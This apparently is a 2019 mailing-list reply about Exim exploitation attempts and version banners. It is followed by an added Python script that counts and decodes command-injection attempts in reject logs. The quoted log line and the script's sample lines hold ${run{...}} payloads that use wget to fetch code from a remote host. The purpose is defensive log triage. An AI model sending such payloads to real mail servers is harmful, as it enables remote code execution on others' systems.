
Re: Exim latest update reports to world as 4.89, which the world thinks is vulnerable.



On Fri 21 Jun 2019 at 06:36:20 +1000, Andrew McGlashan wrote:

> On 21/6/19 5:52 am, Reco wrote:
> > Plain old grep is more than enough here. This one:
> > 
> > grep 'run{' /var/log/exim4/reject*
> > 
> > finds things like these:
> > 
> > 2019-06-19 18:54:43 H=(service.com) [107.182.225.42]
> > F=<support@service.com> rejected RCPT
> > <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x2064.50.180.45\x2ftmp\x2fxxx.xxx.xxx.xxx\x22}}@localhost>:
> > Unrouteable address
> 
> Okay:
>  21 attempts from 8 different IP addresses on one server
> 
>  28 attempts on another server
> 
>  17 attempts on another server
> 
> 
> 13 unique IP addresses so far.... (dig -x output)
> 

So? Looks like a normal day. Announcing exim as version 4.92 (or any
other value) is most unlikely to reduce the number of these attempts.

-- 
Brian.
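
An added example, not part of the original thread: a Python version of the grep-and-count triage discussed above, tallying `${run{` recipients per source IP and decoding the escaped command for review. The log lines are constructed samples with documentation-range addresses, and the line layout is assumed to match the reject-log entry quoted in the thread.

```python
import re
from collections import Counter

# Constructed sample lines (documentation-range IPs, placeholder hosts), laid
# out like the reject-log entry quoted in the thread.
SAMPLE_LOG = r"""
2019-06-19 18:54:43 H=(mail.example) [192.0.2.10] F=<support@mail.example> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20192.0.2.99\x2ftmp\x2fplaceholder\x22}}@localhost>: Unrouteable address
2019-06-19 19:02:11 H=(mail.example) [192.0.2.10] F=<support@mail.example> rejected RCPT <root+${run{\x2Fbin\x2Fsh\t-c\t\x22wget\x20192.0.2.99\x2ftmp\x2fplaceholder\x22}}@localhost>: Unrouteable address
2019-06-19 19:10:00 H=([198.51.100.7]) [198.51.100.23] F=<> rejected RCPT <root+${run{\x2Fusr\x2Fbin\x2Fid}}@localhost>: Unrouteable address
2019-06-19 19:11:30 H=(other.example) [203.0.113.5] F=<a@other.example> rejected RCPT <nobody@example.org>: relay not permitted
""".strip()

# Timestamp, then " [source IP]" (the leading space skips a bracketed HELO
# literal such as H=([198.51.100.7])), then the rejected recipient.
ENTRY = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\d \d\d:\d\d:\d\d) .*? \[(?P<ip>[0-9A-Fa-f.:]+)\]"
    r".*? rejected RCPT <(?P<rcpt>.*)>: "
)
# The marker the grep above looks for: a ${run{...}} item in the recipient.
RUN = re.compile(r"\$\{run\{(?P<cmd>.*)\}\}")
ESCAPES = {"t": "\t", "n": "\n", "r": "\r", "\\": "\\"}

def decode(cmd):
    """Undo \\xHH and \\t style escapes so the attempted command is readable."""
    def sub(m):
        return chr(int(m.group(1), 16)) if m.group(1) else ESCAPES[m.group(2)]
    return re.sub(r"\\(?:x([0-9A-Fa-f]{2})|([tnr\\]))", sub, cmd)

def scan(lines):
    """Return (attempts per source IP, [(timestamp, ip, decoded command)])."""
    per_ip, hits = Counter(), []
    for line in lines:
        entry = ENTRY.match(line)
        run = RUN.search(entry["rcpt"]) if entry else None
        if not run:
            continue  # ordinary rejection, or a line in another layout
        per_ip[entry["ip"]] += 1
        hits.append((entry["ts"], entry["ip"], decode(run["cmd"])))
    return per_ip, hits

if __name__ == "__main__":
    per_ip, hits = scan(SAMPLE_LOG.splitlines())
    print(f"{len(hits)} attempts from {len(per_ip)} different IP addresses")
    for ip, count in per_ip.most_common():
        print(f"{count:6d}\t[{ip}]")
    for ts, ip, cmd in hits:
        print(ts, ip, repr(cmd))
```
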

